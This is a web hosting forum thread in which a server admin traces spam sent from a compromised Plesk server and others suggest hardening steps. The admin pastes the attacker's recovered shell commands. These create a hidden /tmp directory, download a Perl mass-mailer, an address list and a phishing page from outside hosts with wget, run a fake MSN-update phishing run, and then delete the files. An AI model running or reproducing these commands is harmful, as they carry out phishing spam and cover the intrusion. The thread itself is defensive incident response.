• The Horde webmail has been deprecated. Its complete removal is scheduled for April 2025. For details and recommended actions, see the Feature and Deprecation Plan.
  • We’re working on enhancing the Monitoring feature in Plesk, and we could really use your expertise! If you’re open to sharing your experiences with server and website monitoring or providing feedback, we’d love to have a one-hour online meeting with you.

sending spam - Trace php mail script on server?

D

ddegroot

Guest
Hi all!

I got some problems with the email, the mail que is filled with spam. Its stil bussy with removing the spam from the Que. No problem here, just takes some time.

But is it posseble to trace the page who is sending the spam mails? I can see in the maillog that the spam is being send by the apache user, but not from what site...

I hope someone can help me with this!

Thanks in advance.

Dennis,
 
Search is your friend. There are numerous things you can/should do.

1. Install/update/run - RKHunter and CHKRootKit

2. Check /tmp for any scripts which should not be there.

3. Check ALL logs for any additional useful info:
/var/logs/*
/usr/local/psa/var/log/*
/home/httpd/vhosts/domain.com/statistics/logs/*
(/home/httpd/ on your system may be /var/www/ )

Info such as high number of connections by a particular IP address....
(there is a script posted here somewhere to assist in listing number of connections by IP, was posted not too long ago)

4. Install/configure mod_security This will go a LONG way towards keeping a lot of **** from getting onto your system, and keeping bad scripts from being able to run.

5. Change your root and admin passwords, check all user passwords to make sure they are not 'simple' passwords.

6. Check if any hosted domain is using any scripts (such as phpBB) which have any known exploits/vulnerabilities.

These are just a few beginning steps, but all should be done if nothing else.

There is no 'automatic' or 'easy' way to do some of these, other than manually going through and checking each domain. This comes with the job of being a server admin... or a hosting admin...

It is always easier to secure things beforehand than it is to clean it up afterwards.
 
Thanks for youre help,

I found a directory /tmp/.sp

Here where 3 files,
1 with all the email adresses
1 with a perl schript
1 with the mail.

---------- 1 apache wheel 981018 Nov 13 03:47 98.txt
---------- 1 apache wheel 1098 Nov 8 04:11 enviar.pl
---------- 1 apache wheel 10820 Nov 12 21:24 msn.html

still not shure who put them there, but found the source :)
 
I found the script whitch created the files and downloaded the program. Here is a part of the script. Maybe it is to use of someone. I also found in the log files of a customer the file in thear cgi-bin folder. But it has already been removed.

cd /tmp
mkdir .sp
cd /tmp/.sp
wget http://morpheusy.bounceme.net/txt/enviar.pl
wget http://home.graffiti.net/radioterra:graffiti.net/msn.html
wget http://inep.f5k.com/98.txt
perl enviar.pl 98.txt "[email protected]" "Urgente - Atualizacao do Messenger Necessaria - MSN" msn.html
rm -rf /tmp/.sp

It was repeating itself sometime. I found it in /tmp/.bash_history. Also fount a file "bash" in "/tmp/.r". Hope this is the end of this spam script.
 
Finding and deleting the files (for the moment) is fine. But if you do not do anything to shore up your server from being exploited again, then it will just happen again and again. Please see my earlier post, items 1, 4, 5, and 6. Especially 1, 4 and 5.
 
You must log in or register to reply here.

Similar threads

C
Question Block mail if domain doesn't exist in Plesk
Replies
0
Views
114
checkinindza
C
C
Question Analysing Sender IP in Mail Headers
Replies
0
Views
543
Change Maker
C
myra_john
Issue Issues with Email Deliverability on Plesk Server
Replies
1
Views
843
tpitserv
T
S
Question Emails being deleted by DMARC
Replies
5
Views
690
JVG
J
W
Question Mail Server configuration so it does not end up as spam?
Replies
2
Views
688
wyga
W
Back
Top